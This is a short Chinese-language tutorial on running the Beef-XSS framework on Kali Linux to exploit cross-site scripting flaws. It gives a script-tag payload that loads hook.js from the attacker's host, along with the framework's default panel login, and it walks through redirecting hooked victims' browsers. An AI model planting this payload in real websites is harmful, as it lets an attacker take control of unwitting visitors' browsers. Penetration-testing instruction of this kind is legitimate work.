Beef-XSS 是Kali上默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。
这个工具目录是: /usr/share/beef-xss/beef , 也可直接点击图标运行。
MSF(Metasploit Framework)是一套渗透测试和攻击的框架,通过它可以很容易地获取、开发并对计算机漏洞实施攻击。
一: Beef-XSS对XSS漏洞的攻击和利用
我们先去 /usr/share/beef-xss/ 目录下运行 beef程序。
运行成功后,我们可以看到如图所示。 10.96.10.95 是我们主机的内网ip。
而 http://10.96.10.95:3000/hook.js 则是我们的攻击代码,我们要把<script src="http://10.96.10.95:3000/hook.js"></script> 这段payload 插入到存在XSS漏洞的页面中。只要别人浏览到了我们插入代码的页面,我们就可以实施一次XSS攻击了。
注:如果我们要插入payload的网站是一个公网地址的网站的话,我们的内网ip也要转换成相应的公网ip。
http://10.96.10.95:3000/ui/panel 则是我们攻击利用的登录地址。用户名和密码默认都是 beef 。
登录成功后,显示如图。Online Browsers 是目前上线的可以被我们控制的主机。而Offline Browsers则是下线的曾经浏览过存在XSS漏洞页面的主机。10.96.128.19 则是存在XSS漏洞的网站,也就是他们访问的那个网站。
我们点击现在上线的主机,然后点 command ,下面这些则是我们可以执行的一些操作。
我们依次点击如下按钮,用于实现对控制主机访问页面的跳转。就这样,我们就实施了一次XSS漏洞的攻击,让目标主机自动跳转到我们制定的页面。 中间的Module Results History 是我们曾经对这个主机进行过的操作。
